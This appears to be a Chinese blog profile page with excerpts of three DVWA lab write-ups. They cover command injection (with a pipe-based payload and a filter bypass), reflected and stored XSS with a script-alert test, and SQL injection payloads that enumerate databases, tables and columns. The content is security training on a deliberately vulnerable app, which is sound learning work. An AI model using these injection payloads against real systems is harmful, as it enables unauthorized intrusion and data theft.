- 博客(5)
- 收藏
- 关注
原创 dvwa下命令行注入
dvwa下命令行注入在命令行执行时过滤不完全时会导致命令行注入常用连接符&&与&:前后命令都执行|:执行后面的命令,前面命令不执行low:输入一个ip,可以看出是ping一下ippayload:127.0.0.1 | ls -anmedium过滤了&&,&和|都没有过滤high看别人的wp后,发现"| "有个空格。。。所以直接把空格去了就行了命令注入绕过方式https://blog.csdn.net/weixin_395
2021-12-12 17:20:15 2373
原创 DVWA xss
DVWA中的XSS参考文章:http://blog.nsfocus.net/xss-advance/XSS分类:反射型xss与存储型xss的区别主要在于,存储型xss是要存储在数据库中,然后从数据库中调用的反射型xsslow直接输入<script>alert(1)</script>后,直接弹窗,查看源代码,发现直接注入进去了medium和low一样输入,发现不弹窗,回显查看源码,发现...
2021-12-12 01:37:50 679
原创 dvwa中sql注入与盲注
dvwa中sql注入与盲注注入:low:payload:查看字段数目1' order by 2 #1' order by 3 #爆库1' union select 1,database() #爆表1' union select 1,GROUP_CONCAT(TABLE_NAME) FROM information_schema.`TABLES` where TABLE_SCHEMA='dvwa' #爆字段1' union select 1,GROUP_CONCAT(COLUMN
2021-12-11 23:11:10 3292
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人